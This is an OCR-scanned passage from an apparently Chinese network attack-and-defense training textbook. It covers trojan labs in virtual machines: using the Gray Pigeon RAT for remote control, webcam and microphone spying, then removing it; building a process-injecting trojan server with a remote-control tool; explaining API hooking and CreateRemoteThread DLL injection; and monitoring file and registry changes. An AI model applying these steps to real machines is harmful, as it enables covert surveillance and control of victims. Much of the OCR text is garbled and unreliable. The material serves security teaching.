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四 QAETREESS [EE ERE] 。 192. 168. 1. 115 


XED 设置 @) IRD 帮助 Q0 


-= 


| BELA MERE eem ent Te — EEHISS E iB 


ERERUS. YYY- D9994201316 成 功 | 
驱动 器 列表 读 职 完毕 . 现在 可 以 对 主机 进行 远程 控制 了 . 11:43:37 


| | 目 动 上 线 : 1] 台 l. 


B]4-15 客户 端 实现 对 服务 器 的 远程 控制 


10 GO 浆 惠子 远程 控制 
XD 设置 @) IAV EHW 


LER E CI 192. 168. 1. 115 


SSi MORE MMES Mie 配置 服务 程序 Sik — BE 


ECCL E UL  -— | [ 
E —Á'T Saimen — (e| SUM (nugas e ( f) 


3200.06 NHz 
n 1048096KB 
Æ: Windows IP 5.1 (2500.Service Pack 3) 
F: C: MINDOTSA 
al: Tr. TlaF. Coll 
: MHK 


SISTEN 
2013-5-2 11:44:21 
0:19:45 
T1TT-7999420E316 
8001600 


ALTE D IE I HUC Ero: c Dou oi ursw- DENTIA 


"IUTITYTTTTT 
读 取 系统 信息 完毕 - 11:44:20 


4-16 ”对 “肉鸡 ”进行 远程 控制 


图 4-16 中 的 其 他 操作 有 剪 切 板 查 看 .进程 管理 .服务 管理 .共享 管理 .代理 服务 .插件 管 
理 , 读 者 可 以 在 实验 中 进行 测试 。 

步骤 6: 单 击 “ 捕 获 屏幕 ”图 标 ,远程 服务 器 的 操作 窗口 将 会 显示 在 本 地 计算 机 (VPC1) 
上 ,通过 “传送 鼠标 和 键盘 操作 ”功能 还 可 以 对 服务 器 端 (VPC2) 进 行 鼠 标 和 键盘 控制 。 其 
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他 操作 包括 "保存 当前 画面 ”录制 mpeg 文件 ”发 送 组 合 键 等 ,读者 可 以 在 实验 中 进行 
测试 。 
步骤 7: 灰 饮 子 除 了 能 够 远程 视频 监控 外 ,还 包括 语音 监听 、 语 音 发 送 等 功能 ,只 要 远程 
计算 机 (VPC2) 安 装 有 摄像 头 , 且 正常 打开 时 所 需要 的 系统 资源 没有 被 占用 ,那么 读者 可 以 
看 到 远程 摄像 头 捕 获 的 图 片 ,还 可 以 把 远程 摄像 头 捕获 的 画面 在 本 地 计算 机 上 进行 保存 。 
步骤 8: Telnet 远程 登录 。 客 户 端 可 以 Telnet 到 远程 被 控制 计算 机 (VPC2) ,对 远程 计 
算 机 进行 配置 操作 ,如 图 4-17 Bron 


JOG) 
| D 设置 @) IA) 8850) | 
Eb He BERS B4 aio 2 b 退出 
- D LI 168. 1. 114] : 保存 
"NI oft Window wow 9d. 2600] 二 
) ) 版 权 所 [有 1985- eod Mi Corp. 外 


C: NWINDOWS'system322 


iz B3 ME 
HET UMP 


PASS : Dir 


目 动 上 线 : 1 台 


图 4-17 对 远程 服务 器 进行 Telnet 配置 


Ix 8S F 55 $80 Sx 

IK 8S Y- H5 8] RC E: E E38 VA. P JL RR JE iE. 

(1) 2€ P CVPC1) EE., Eid A] 4-18 P AS“ EE IR A ug du E BI P] 6 GE Hc 25 n id 
(VPC2) BS 81 C, 

(2) IRI Ar tim C V PC2) P JE RE E ix. Ze: AI SE y HJ RC x «DL 7S HS Iz HE P o 8 BS UK 2$ 
s XB EH 2 73 SXORKGBIL EG. HZ I REP s 

步骤 1: SUKRS RAT rtt. ARUM CAKE. H FARI up ste um P E bx 3k ds P 
找 不 到 该 程序 ), 因 此 通过 “任务 管理 器 ”是 看 不 到 服务 端 进程 的 。 这 时 ,可 以 借助 工具 
IceSword 找到 隐 藏 进程 。 本 实验 中 , 隐 着 进程 为 iexplore. exe, 找 到 它 并 在 其 上 而 击 ,在 出 
现 的 快捷 菜单 中 选择 “结束 进程 ”选项 ,如 图 4-19 所 示 。 此 时 可 以 在 客户 端 看 到 “肉鸡 ”已 经 
下 线 , 如 图 4-20 所 示 。 

步骤 2: 由 于 仅仅 结束 进程 是 没 用 的 , 当 重 新 开机 启动 时 , 灰 饮 子 的 服务 端 进程 又 会 重 
新 启动 ,因此 还 需 将 它 的 启动 项 删除 。 具 体 方法 为 : 在 服务 器 端 打 开 “ 运 行 ” 命 令 框 ,输入 
"services, msc ”命令 ,在 打开 的 “服务 ”对 话 框 中 将 对 应 的 进程 "停止 ”。 
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[加 O^GETIEEREBM DEBERI ”192. 168.1.115 
XO SEG IR( 8800 


w | ! T: 
自动 上 线 MARE 视频 语音 Tant — 配置 服务 程序 最 小 化 退出 


| 省 入 :| mrnepatznrat6 | nani [vrro] ism: — 5 ([ | ( mm) 
MEAS: — $ $$ | Baten [e] “| 显示 搜索 结果 |e] 


XS [SER 远程 控制 命令 注册 表 匾 加 器 AS d 


重启 计算 机 
关闭 计算 机 


JEdEpOIb.wwW-D929420E316 成 功 ! | 


驱动 器 列表 读 取 完毕 . 现在 可 以 对 主机 进行 远程 控制 了 ，11:53:00 BI] 225 E) 


图 4-18 ”通过 客户 端 远程 卸载 服务 器 端 程序 


Bi vyu42D46 
: mft 转 储 插件 ”外观 ”帮助 
D M 1 8 LOG (2) 


Persen 1d... NT OS Kernel Ox8055DO0CO 
sys tem NT OS Kernel 0x863B5B98 
|- -canon. exe C: NWINDOWSNsystem32Nct£mon. exe Ox8SEBEDAO 
| 四 smss. exe : WINDOWS Nsystem32Nsmss. exe Ox8B524EATO 
Pls exe : NINDOWSNsystem32Xesrss. exe Dx8631C458 
n winlogon. exe : MNINDOWSNsystem32Wwinlogon. exe 0xG5235A858 
: NINDOWSNsystem32 services. exe 0x85252T00 
: NNINDOWSNsystem323lsass. exe 9 0x6623CC10 
: WINDOWS Nsystem32*svchost. exe OxG5FO6DDAO 
: NINDOWS*system32'svchost. exe Üx85F904B8 


sevi ces. exe 
| 回 1sass. exe 

E svchost. exe 
svchost. exe 


[E svchost. exe 
[F] spoolsv. exe 
E SGTool. exe 

[F] svchost. exe 
F- IEXPLORE. EXE 


| “IceSword. exe 


: WINDOWS\system32\svchost. exe OxG5F4A508 
: MNNINDOWSSsystem32Yspoolsv. exe 0x86315558 
: NPROGRA "15S0G0UI1*650"1. 918N5GTool. exe Ox85F2TDAO 
: aiiora t re exe 0x8531CC10 

\Program File nins er NIEXPLORE. EXE 8 ÜxGSEBAO20 
:\to eil ceSwd 22 Penh] ceSword. exe 0x86628F5DO0 
: NNTNDOWS S exp n Ne ÜxG5EETO40 


C 
C 
C 
C 
C 
C 
C 
[E svchost. exe C: “WINDOWS\system32\svehost. exe 0x66312TE6 
C 
C 
C 
C 
D 
C 


| 4 explorer. exe 


Si IceSwordi22cn B «i246 


4-19 “结束 进程 ?选项 


步骤 3: 将 灰 铝 子 局 动 服务 删除 。 和 选择“ 开始 ”一 “运行 > 一 regedit 选项 ,打开 “注册 表 编 
辑 器 ”对 话 框 ,找到 注册 表 项 HKEY LOCAL MACHINENSYSTEMNVCurrentControlSet^ 
Services ,删除 Windows Power Control, 
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Q O2 IREEESM LEER] 。 192.168.1.117 
XD 设置 @) IAT 帮助 tp 
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. BAIR WERB WIE tde 配置 服务 程序 Re Bi 
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由 -ENHTUT mORL. Re) 
USES SALE 

“ia m Bx |? A D 
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X^ CE) 
a $2006) a 
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连接 成 功 -WD999420E316 成 功 ! — ~ 

驱动 器 列表 读 取 完毕 . 现在 可 以 对 主机 进行 还 程控 制 了 .12:05:02 E 让 我 们 共同 进步 
V 

—————'——————  €— BÀ 1 Ó5 204 aed 


420 在 客户 端 看 到 “肉鸡 ”已 经 下 线 


步骤 4: 清除 灰 铝 子 文 件 。 在 图 4-21 所 示 的 “注册 表 编 辑 器 ?对 话 框 中 可 以 看 到 灰 鸽 子 
的 安装 路 径 为 C: NWindowsM 2345. ini, 即 配置 服务 器 时 系统 使 用 的 安装 路 径 , 需 要 在 服务 
dn ig 44 12. SC LER S 


DOBGÉ*iu x = 口 | 区 | 
rft) RRE SEV KERA 帮助 0 
C3 ws ^| zm 类 型 E: M 
由 国 usbhub iab] tU) REG SZ GARRE) 
C] usbuhei [ab] Description REG SZ 管理 windows 系 统 岂 源 ， 
esc VesSave [ab] Di splayNane REG SZ Windows Power Contro 
hi x ^ BE)ErrorControl REG DWORD Dx00000000 (D 
6 di Vikosi (ab]ImagePath REG EXPAND SZ 
G C3 VolSnap iab]Ob j ectNane REG SZ ocalSystem 
BEStart REG DWORD 0x00000002 (2) 
BET». REG DWORD 0«00000110 (272) 


| &ic — 
TXTETETTWTUTT 


n | 
Su 
: = = 
sma 9 复制 项 名 称 (C) 


4-21 “注册 表 编 辑 器 ”对 话 框 中 发 现 的 “12345. ini” 文 件 所 在 的 位 置 


qi 
à 


需要 说 明 的 是 ,如 果 读 者 在 C:\Windows 目录 下 没有 找到 该 文件 ,可 以 选择 “工具 ”一 
“文件 夹 ” 选 项 ,在 打开 的 如 图 4-22 所 示 的 对 话 框 中 ,取消 选中 “隐藏 受 保护 的 操作 系统 文件 
(推荐 )” 复 选 框 ,选中 “隐藏 文件 和 文件 夹 ” 中 的 “显示 所 有 文件 和 文件 夹 ” 复 选 框 ,此 时 在 
C:\Windows 目录 中 就 可 以 找到 被 隐藏 的 文件 “12345. ini”. 


130 网 络 攻 击 与 防御 实 训 


文件 光 视 图 


cy 您 可 以 格 正在 为 此 文件 夹 使 用 的 视图 (例如 详细 
(ABXCEHORIBAIE TEX. 


用 到 所 有 交 件 夹 L | EEMALE RR) 


记性 每 个 文件 丈 的 视图 设置 
使 用 简单 文件 共享 (推荐 ) 
Rixsserrix summa erm 
O SqURIETEPEXERO PAUSE 
E me 
O Bao te PER 

O RISSETTPERUPEXE 

OO 显示 所 有 文件 和 文件 来 
隐 蕊 已 知 文件 类 型 的 扩展 
用 彩色 显示 加 密 或 压缩 的 NTFS XU 
O 在 标题 栏 显示 完整 路 径 


还 原 为 默认 值 O0) 


图 4-22 显示 所 有 文件 和 文件 夹 


4.2.4 任务 与 思 


网 页 木马 对 应 于 客户 端 感染 的 两 个 阶段 如 下 。 

1. 漏洞 利用 阶段 

网 页 木马 被 客户 端 加 载 后 ,攻击 代码 所 在 的 程序 利用 内 存 破 坏 类 漏洞 将 执行 流 跳 转 到 
ShellCode 或 直接 利用 任意 下 载 的 API, 在 客户 端 下 载 .执行 盗号 木马 或 僵尸 程序 。 

2. 恶意 程序 执行 阶段 

下 载 的 盗号 木马 或 僵尸 程序 等 恶意 程序 , 禄 取 客 户 端的 账号 等 隐私 信息 或 使 客户 端 成 
为 “肉鸡 ?加 入 僵尸 网 络 。 

本 实验 通过 对 灰 铝 子 木 马 工具 的 介绍 ,使 谈 者 对 木马 的 攻击 过 程 有 了 一 个 较为 宏观 的 
认识 。 尤 其 是 通过 本 实验 ,可 以 充分 理解 木马 的 工作 原理 ,能 够 将 木马 与 其 他 的 恶意 代码 在 
实现 功能 上 区 别 开 来 。 

从 技术 上 讲 , 本 实验 中 介绍 的 灰 馏 子 工具 ,其 实质 是 一 个 远程 控制 工具 。 远 程控 制 工具 
一 般 应 用 在 网 络 管理 工作 中 ,如 网 络 管理 人 员 可 以 通过 远程 控制 方式 来 对 远程 主机 进行 配 
置 和 管理 。 但 是 ,如 果 将 这 一 工具 应 用 到 攻击 过 程 中 ,将 会 带 来 巨大 的 安全 威胁 。 

为 此 , 谈 者 在 完成 本 实验 后 ,需要 从 安全 防范 要 求 出 发 ,继续 学 习 和 和 擎 握 有 关 木 马 攻击 
的 安全 防范 方法 。 


4.3. KE Baik T 


4.3.1 预备 知识 : 木马 的 隐藏 方式 
躲避 防火 场 和 安全 软件 的 发 现 是 木马 程序 应 具备 的 最 基本 的 功能 ,木马 程序 需要 采用 
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各 种 方式 隐藏 日 己 ,避免 被 安全 系统 发 现 和 人 退 踪 。 木 马 一 般 采 用 本 地 隐 茂 和 通信 隐藏 两 种 
方式 。 


1. 本 地 隐藏 


为 了 隐藏 目 己 ,早期 木马 将 自己 设置 为 隐藏 文件 ,或 者 命名 为 系统 文件 ,但 是 这 些 方法 
已 经 能 够 被 绝 大 多 数 安全 软件 很 容易 地 发 现 ,为 了 自身 的 存在 ,木马 必须 寻找 更 隐蔽 的 隐藏 
方式 。 本 地 隐藏 方式 可 以 分 为 以 下 几 种 类 型 。 

(1) 寄 答 隐藏 。 寄 答 隐 藏 是 将 木马 程序 隐藏 在 正常 程序 中 ,程序 成 为 了 木马 的 载体 ,对 
于 一 些 不 熟悉 操作 系统 工作 机 制 或 粗心 的 用 户 比 较 有 效 。 

(2) 变化 隐藏 。 变 化 隐藏 则 在 不 改变 环境 的 情况 下 进行 自我 变化 ,通过 更 改 文件 名 、 时 
间 、 注 册 表 等 方式 来 迷惑 目标 用 户 。 

(3) 协作 隐藏 。 协 作 隐 藏 则 将 木马 分 成 几 个 部 分 隐藏 在 不 同位 置 ,相互 监视 协助 ,是 一 
种 较为 项 固 的 木马 ,全 面 查 杀 存在 一 定 的 难度 。 

2. 通信 隐藏 

通信 端口 会 又 露 木 马 的 存在 ,因此 木马 将 控制 端 设 置 为 服务 端 ,通过 控制 端 主动 监测 并 
进行 通信 ,能够 绕 过 防火 墙 。 通 过 建立 触发 机 制 , 当 服 务 端 运行 网 络 程序 后 木马 会 取得 系统 
控制 权 ,通过 端口 完成 外 部 通信 。 


4.3.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,读者 将 达到 以 下 学 习 目 的 。 

(1) 了 解 木 马 隐藏 技术 的 基本 原理 。 

(2) 提高 木马 攻击 的 防范 意识 。 

(3) 明确 木马 技术 的 发 展 方 向 。 

(4) 学 会 使 用 木马 防范 的 相关 工具 。 

2. 实验 条 件 

本 实验 建议 读者 在 虚拟 机 环境 下 进行 ,需要 提供 两 台 虚 拟 机 ,分 别 为 客户 端 计算 机 
VPC1 和 服务 器 端 计算 机 VPC2 ,操作 系统 可 以 同时 使 用 Windows XP 或 其 他 的 版 本 ,而 且 
将 VPC1 和 VPC2 设置 在 同一 网 段 ,以 便于 相互 之 间 的 通信 。 

男 外 ,还 需要 准备 * 上 兴 远 程控 制 ” 工 具 , 该 工具 是 一 款 小 巧 人 简单 的 远程 监控 软件 ,可 以 
在 实验 环境 下 实现 木马 的 隐藏 功能 。 


4.3.3 实验 过 程 


步骤 1: 正常 登录 到 实验 环境 中 的 攻击 者 VPC2CP 地 址 为 172. 17. 135. 28) 和 VPCI1 
靶 机 (IP 地址 为 172. 17. 135. 27) ,分 别 使 用 “ping” 命 令 测 试 对 方 IP 地 址 的 连通 性 ,确保 
VPC1 和 VPC2 之 间 能 够 正常 通信 。 

步骤 2: 生成 木马 服务 器 端 程序 。 在 攻击 机 VPC2 上 ,运行 上 兴 远 程控 制 工具 ,打开 如 
图 4-23 所 示 的 操作 窗口 。 
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= 上 兴 远 程控 制 2008 正 式 版 172. 17. 135. 28 -AT 
THE EEO EEV IAV SmBW»bOD 


mails a Xe1- [JN an [i en [sses] CEN 
: lalale eala osh — 


tT MEISTE: nonmen n Obit ng 
A 4-23 上 兴 远 程控 制 工具 操作 窗口 


步骤 3. 选择 “文件 ”一 “配置 服务 程序 ”选项 ,在 打开 的 如 图 4-24 所 示 的 对 话 框 中 对 服 
务 器 端 进 行 配置 。 其 中 ,IP 地 址 填写 172. 17. 135. 28:8181(VPC2 的 IP 地 址 和 端口 ) ,其 他 
信息 的 填写 和 配置 可 以 通过 单 击 “ 填 写 说 明 ” 按 钮 后 ,根据 提示 信息 进行 设置 。 


= MEE S x 
IP 通知 http 访 问 地 址 、DNS 域 名 解析 或 静态 IF 详细 帮助 


| 提示 : 先 申请 一 个 动态 解析 域名 或 FTF, 点 击 详细 才 助 > 
| 填写 说 明 | | 测试 PTP 
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v 使 用 IE 浏 览 器 进程 启动 服务 端 ( 守 防 火 墙 ) 


已 质 system32 目 录 的 系统 次 件 : nstse. exe [-] 


同 修 改 日 期 过 主动 F 无 特征 复制 到 目录 
r 2K/XP/2003TE8 die D 感染 硬盘 , 移动 设备 
同 运行 后 自动 删除 安装 交 件 
r 是 否 使 用 Fs6 加 过 压缩 服务 端 
BZZ: CE 
服务 显示 名 称 
HE 
P 自 克隆 保护 文件 安装 路 径 : 
保护 文件 插入 的 系统 文件 : [cale exe [= 
历史 配置 : | 默认 配置 z) à 
meo] el | 
下 载 新 的 服务 端 : | 


图 4-24 配置 服务 器 端 
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步骤 4: 单 击 “生成 服务 端 ” 按 钮 ,将 生成 木马 程序 。 将 生成 的 木马 程序 复制 到 靶 机 
VPC1(IP 地 址 为 172. 17. 135. 27) 端 。 

步骤 5: 在 172.17.135. 27(VPC1) 端 双击 木马 客户 端 ,使 靶 机 植 人 木马 ,并 接受 控制 端 
的 控制 。 

步骤 6: 这 时 ,在 训 机 上 打开 “任务 管理 颖 ”, 并 不 会 发 现 木 马 程序 对 应 的 进程 ,但 是 细心 
的 读者 会 发 现 ,IEXPLORE. EXE 和 calc. exe 两 个 进程 存在 可 疑 , 如 图 4-25 所 示 , 因 为 在 邯 
机 上 并 没有 启用 这 两 个 进程 对 应 的 程序 。 有 这 两 个 进程 的 原因 在 于 制作 木马 时 选择 了 插入 
相关 进程 ,从 而 实现 了 进程 的 隐藏 。 
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图 4-25 发 现 可 疑 进 程 
步骤 7: 可 以 借助 Wsyscheck 工具 检查 靶 机 的 进程 ,如 图 4-26 所 示 , 读 者 会 发 现 ， 


IEXPLORE. EXE 和 calc. exe 两 个 进程 确实 存在 安全 问题 ,在 Wsyscheck 工具 的 “安全 检 
查 ” 中 还 可 以 发 现 木 马 程 序 的 服务 项 。 
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Wsyscheck 是 一 于 功能 较为 强大 的 系统 检测 和 维护 工具 ,可 以 对 操作 系统 的 进程 和 服 
务 驱 动 进 行 检查 。 


4.3.4 任务 与 思 


通过 本 实验 ,使 谈 者 对 木马 的 产生 和 隐藏 方法 有 了 一 个 主观 的 认识 ,在 该 实验 的 基础 
上 ,读者 还 需要 对 木马 的 隐藏 方式 进行 深入 的 学 习 。 

木马 程序 隐藏 通常 指 利 用 各 种 手段 伪装 木马 程序 ,让 一 般 用 户 无 法 从 表面 上 直接 识别 
出 木马 程序 。 要 达到 这 一 目的 可 以 通过 程序 搁 绑 的 方式 实现 ,程序 拥 绑 方式 是 将 多 个 . exe 
程序 链接 在 一 起 组 合成 一 个 EXE 文件 , 当 运 行 该 EXE 文件 时 ,多 个 程序 同时 运行 。 程 序 搁 
绑 有 多 种 方式 ,如 将 多 个 EXE 文件 组 合 到 一 个 EXE 文件 中 、 利 用 专用 的 安装 打包 工具 将 多 
个 EXE 文件 进行 组 合 , 这 也 是 许多 程序 捆绑 流 谍 软 件 的 做 法 。 

因此 ,木马 程序 可 以 利用 程序 捆绑 的 方式 ,将 自己 和 正常 的 EXE 文件 进行 捆绑 。 当 双 
击 运 行 捆 绑 后 的 程序 时 ,在 正常 EXE 文件 运行 的 同时 ,木马 程序 也 在 后 台 悄悄 地 运行 。 

程序 隐藏 只 能 达到 从 表面 上 无 法 识别 木马 程序 的 目的 ,但 是 可 以 在 "任务 管理 咒 ” 中 发 
现 木 马 程序 的 踪迹 ,这 就 需要 木马 程序 实现 进程 隐藏 。 隐 藏 木马 程序 的 进程 在 显示 时 能 够 
防止 用 户 通 过 “任务 管理 器 ”查看 到 木马 程序 的 进程 ,从 而 提高 木马 程序 的 隐蔽 性 。 目 前 , 隐 
藏 木马 进程 主要 有 如 下 两 种 方式 。 

1. API 拦截 

API 拦截 技术 属于 进程 伪 隐 藏 方式 , 它 通过 利用 Hook( 钧 子 ) 技 术 监 控 并 截获 系统 中 
某 些 程序 对 进程 显示 的 API 哺 数 调用 ,然后 修改 子 数 返回 的 进程 信息 ,将 自己 从 结果 中 删 
除 , 导 致 “任务 管理 器 ”等 系统 工具 无 法 显示 该 木马 进程 。 

API 拦截 的 具体 实现 过 程 是 : 木马 程序 建立 一 个 后 台 的 系统 钧 子 (Hook) ,拦截 PSAPI 
的 EnumProcessModules 等 相关 函数 的 调用 , 当 检 测 到 结果 为 该 木马 程序 的 进程 ID(PID) 
时 直接 跳 过 ,这 样 进程 信息 中 就 不 会 包含 该 木马 程序 的 进程 ,从 而 达到 隐藏 木马 进程 的 
目的 。 

2. 远程 线程 注入 


远程 线程 注入 属于 进程 真 隐 藏 方式 , 它 主要 利用 CreateRemoteThread 函数 在 某 一 个 
目标 进程 中 创建 远程 线程 ,共享 目标 进程 的 地 址 空间 ,并 获得 目标 进程 的 相关 权限 ,从 而 修 
改 目 标 进程 内 部 数据 和 启动 dll 木马 。 通 过 这 种 方式 启动 的 dll 木马 占用 的 是 目标 进程 的 
地 址 空间 ,而 且 上 自身 是 作为 目标 进程 的 一 个 线程 ,所 以 它 不 会 出 现在 进程 列表 中 。dll 木马 
的 实现 过 程 如 下 。 

(1) 通过 OpenProcess 哺 数 打开 目标 进程 。 

(2) 计算 dll 路 径 名 需要 的 地 址 空间 ,并 根据 计算 结果 调用 VirtualAllocEx A% H ËR 
进程 中 申请 一 块 大 小 合适 的 内 存 空间 。 

(3) 调用 WriteProcessMemory 图 数 将 dll 的 路 径 名 写 人 申请 到 的 内 存 空 间 中 。 

(4) Ñ| H ER FX GetProcAddress 计算 LoadLibraryW 的 入 口 地 址 ,并 将 LoadLibrary W 
的 入 口 地 址 作为 远程 线程 的 入 口 地 址 。 

(5) 3B E PR C CreateRemoteThread 在 目标 进程 中 创建 远程 线程 。 
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通过 以 上 步骤 就 可 以 实现 远程 线程 注入 启动 dll 木马 ,达到 隐藏 木马 进程 的 目的 。 而 
且 ,远程 线程 注入 方式 与 其 他 进程 隐藏 技术 相 比 ,具有 更 强 的 隐蔽 性 和 反 查 杀 能 力 , 增 加 了 
木马 的 生存 能 力 。 


4.4 木马 攻击 辅助 分 析 : 文件 、 注 册 表 修改 监视 


4.4.1 预备 知识 : 木马 攻击 辅助 分 析 工 具 介 绍 


木马 作为 一 种 特殊 的 恶意 代码 对 网 络 安全 构成 了 很 大 的 威胁 。 加 强 木 马 的 检测 和 防范 
是 一 种 非常 重要 的 工作 。 下 面 介 绍 3 个 典型 的 木马 攻击 辅助 分 析 工 具 。 

1. 文件 系统 监视 软件 Filemon 

Filemon 是 一 球 文 件 系统 监视 软件 , 它 可 以 监视 应 用 程序 进行 的 文件 读 写 操作 ,并 能 够 
将 所 有 与 文件 相关 的 操作 (如 读 取 修改 、 出 错 信 息 等 ) 全 部 记录 下 来 以 供用 户 参 考 , 并 允许 
用 户 对 记录 的 信息 进行 保存 、 过 滤 、 查 找 等 处 理 ,为 用 户 对 系统 的 维护 提供 了 极 大 的 便利 。 

2. 文件 监视 软件 FileChangeNotify 

FileChangeNotify 文件 监视 软件 可 以 监视 目录 和 与 之 相关 内 容 的 变化 。 例 如 ,在 目录 
下 创建 子 目 录 或 文件 等 操作 ,都 可 以 被 监测 到 。 

3. 注册 表 数 据 库 监视 软件 Regmon 

Regmon(Registry Monitor) 是 一 球 注 册 表 数据 库 监 视 软 件 , 它 将 与 注册 表 数 据 库 相关 
的 一 切 操作 (如 读 取 修改、 删除 等 ) 全 部 记录 下 来 以 供用 户 参 考 , 并 允许 用 户 对 记录 的 信息 
进行 保存 、 过 滤 、 查 找 等 处 理 。 


4.4.2 实验 目的 和 条 件 


1. 实验 目的 

本 实验 通过 对 几 个 工具 软件 使 用 方法 的 介绍 ,让 读者 对 涉及 的 一 些 重要 应 用 和 操作 进 
行 安全 监控 ,并 能 够 通过 对 监控 数据 的 分 析 发 现 系统 中 存在 的 安全 威胁 。 从 操作 层面 上 看 ， 
需要 读者 主要 掌握 Filemon, FileChangeNotify 和 Regmon 软件 的 功能 特点 和 使 用 方法 。 

2. 实验 条 件 

本 实验 可 以 在 一 台 运 行 Windows Server 2003 及 以 上 版 本 操作 系统 的 主机 上 进行 ,在 
开始 实验 之 前 ,需要 安装 Filemon、FileChangeNotify 和 Regmon 软件 。 在 本 实验 中 ,将 所 需 
要 的 软件 先 保存 在 D:\tools 文件 夹 中 。 


4.4.3 实验 过 程 


步骤 1: 以 Administrator 和 刁 份 正常 登录 实验 中 的 主机 后 ,进入 D:\tools 下 的 filemon 
文件 夹 ,找到 Filemon. exe 软件 ,双击 打开 , 即 可 进入 Filemon 软件 界面 。 

步骤 2: 运行 Filemon 软件 后 , 即 可 把 所 有 与 文件 相关 的 操作 全 部 记录 下 来 ,如 图 4-27 
所 示 , 而 且 可 以 根据 序号 、 时 间 、 进 程 、 请 求 、 路 径 \、 结 果 等 来 查看 相关 的 内 容 。 
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步骤 3: 选取 需要 碍 看 的 进程 并 右 击 , 在 出 现 的 快捷 沫 单 中 选择 "进程 属性 ?选项 ,将 打 


开 如 图 4-28 所 示 的 对 话 框 ,在 其 中 显示 该 进程 文件 所 在 的 位 置信 息 
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步骤 4: 双击 茶 个 进程 ,可 以 打开 该 进程 文件 所 在 的 文件 夹 , 如 图 4-29 Bron o 
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O Tenp 


3 Q Temporary Internet Files 
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Xt 
文件 来 
文件 来 
文件 来 
1 B 配置 设置 
[f] index. dat 32 KB DAT 文件 


图 4-29 定位 进程 文件 所 在 的 文件 夹 
步骤 5: 选择 “文件 ?一 “另存 为 ?选项 , 即 可 将 该 信息 保存 下 来 , 供 分 析 使 用 。 


2013-12-24 10:01 
2013-12-24 10:01 
2013-12-24 10:01 
2013-12-24 10:01 
2013-12-24 10:01 
2014-2-T 13:24 
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步骤 6. 运行 D:Ntools 文件 夹 下 的 FileChangeNotify. exe 软件 ,在 打开 的 如 图 4-30 所 
示 的 对 话 框 中 单 击 “开始 监视 ”按钮 , 即 可 对 文件 进行 监视 。 


m Xf t Urs D s 


图 4-30 FileChangeNotify 软件 开始 对 文件 进行 监视 
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步骤 7: 读者 可 以 尝试 在 桌面 上 建立 一 个 名 称 为 “新 建文 件 夹 ”的 文件 夹 ( 文 件 名 自 定 )， 
当 返 回 FileChangeNotify 窗口 时 ,就 会 发 现 该 操作 已 被 监视 到 ,并 记录 下 来 ,如 图 4-31 
所 示 。 


4-31 FileChangeNotify 软件 已 经 监视 了 新 创建 的 文件 夹 


步骤 8: 随后 ,如 果 先 将 前 面 创建 的 “新 建文 件 夹 ”的 名 称 修改 为 test, 再 将 其 删除 , 当 返 
El FileChangeNotify 窗口 时 ,会 发 现 该 操作 全 部 被 记录 下 来 ,如 图 4-32 所 示 。 
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4-32 FileChangeNotify 记录 下 了 文件 夹 名 称 修改 和 删除 的 信息 


步骤 9: 打开 D:N\tools\Regmon 文件 夹 ,运行 Regmon 软件 ,打开 如 图 4-33 所 示 的 
Regmon 操作 界面 (该 界面 与 Filemon 非常 相似 ) ,对 注册 表 信 息 进 行 查看 。 
步骤 10: 双击 任意 进程 ,可 以 看 到 该 进程 所 在 注册 表 的 位 置 , 如 图 4-34 所 示 。 
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HECU\SotimrelC lasses success 
MECU,SofimsrelCInSreciDrive|cheller|FolderFxte... BOT FOUND 
HEC P Ur ive chellexiFoldertxt enzions|[tbet£aóB-... SUKCESS 
MEC A Ur vet cheTleriFolderPrt enzíonc)[tfhetg3OE"... SIKCESS 
MEC US ofimareiClazzez0rive,zhellex|Folderfxte... WT FOUND 
MEC P, [rive chelleriFolderlrt enzíons[fbetga0E-... SUCCESS 
HEC PA trive zhellexiFolderDxt enzionz[fbetZaóB-... SUCCESS 
HEC PA Ur fe! chellexiFold er Pxt enzionz pior.. 
MEC RA Ur ve^, shel 1er! Fold er rrt enzionc SIKCESS 
HE U Sot mxr etl ticrosofiV Winds Curremt Version... SUCCESS 
HIC I Sofioretill terosofi i Mimos Curren Version... SIKCESS 
MEC US ofi mar eS ic rosofiVWimiomziCurremiVersion... SCES 
HEC USotimrellicrosti Nimoms Current Version... SIKCESS 
MEC UA S of rrr etl 1c ro soft imion Currem Version... SIKCESZ 
HEC USotiar eil icrosotiVminiomsiCurremi Version... SUCCESS 
HEC IS ofer ell terosofi mimos Curren Version... SüKCFSS 
HEC UL Sofi mr etl ic rosoftiVTmi mtomsiCurrem Version... SUCES 
1. 156265 TT HEC IS ofer etl te rosofi Timoms Currem Version... SCESS 
1. 15562204T E HEC US ofer etl te rosoft mimos Curren Version... SüKCFSS 
1.15601261 HEU 5 EC URTTY Policy SECES 
1. 15605092 HEL S EC UNITY) Policy S ec Desc SBKCSS 
1. 1560 T440 HELL'S EC UNITY Po11c7^5 ec Dexc V (Default ) 5urrER O... 
1.156112 79 HELM S EC URTTY Po11c745 ec Desc sucus 
1. 56E MEL VS EC URTTY PolicyAS ec Dec S 区 CESS 

1. 1563646 HELA S EC URTTY Po1íc 7^5 ec Dese) (Petxul) SECES 

1. 1569562 HEL S EC UNITY Policy Se Dest Success 

1. 15603 TZ HELÈ V5 EC UNITA Policy SECES 
B. 16630225 HEUS, DEFLULTASOfi mr eicromat Windows curren., NOT FOUND 
E. 155358 1T HELÉ SOFTE, Polic dest icrosofi'Windows'Curre... BOT FOUND 
E. i116 HEC U SKCESS 
E. 355P63 TT HEC u sucrss 


1. 14902051 
1. 1490864 TT 
1. 14945652 
1. 150602 
1. 14964231 
1. 196580 
1. 1496025 T 
1. 1500 3249 
1. 300848 T 
1. 15009622 
1. 180 32908 
1. 150 36254 
1. 5325 
1. 15596569 
1. 15599468 
1. 154101304 
1. 15404465 
1. 项 406T99 
1. 15409956 
1.15435606 
1. 35 TG 
1. 1543921T 
1. 15472046 
1. 15424365 
1. 15426751 
1. 15450085 
1. 1545? T99 
1. 15456614 
1. 15459045 
1. 1441704 
1. 15445252 
1. 154464 25 
1. 154 WTE 
1.154 T92 T9 
1. 4422 118 
1. 154345331 
1. TOET 
1. 5636722 
1. 15620237 
1. 15875 324 


a di 


F 


和 
AELH 


图 4-33 Regmon 操作 界面 


吉村 | 


| 由 -Li AppEvents aji ZER | RW | 数据 - 
i Console sd SAU, (数值 未 设置 ) 
Control Panel 24 
Environment 
由 - 国 PC 
由 -为 Identities 
mc Keyboard Layout 
由 Printers 
-E SessionInformation 
gea Software 
: E Classes 
mc Microsoft 
9c Netzcape 


H- onc 

ES Policies 

1 {£ SegouInput 

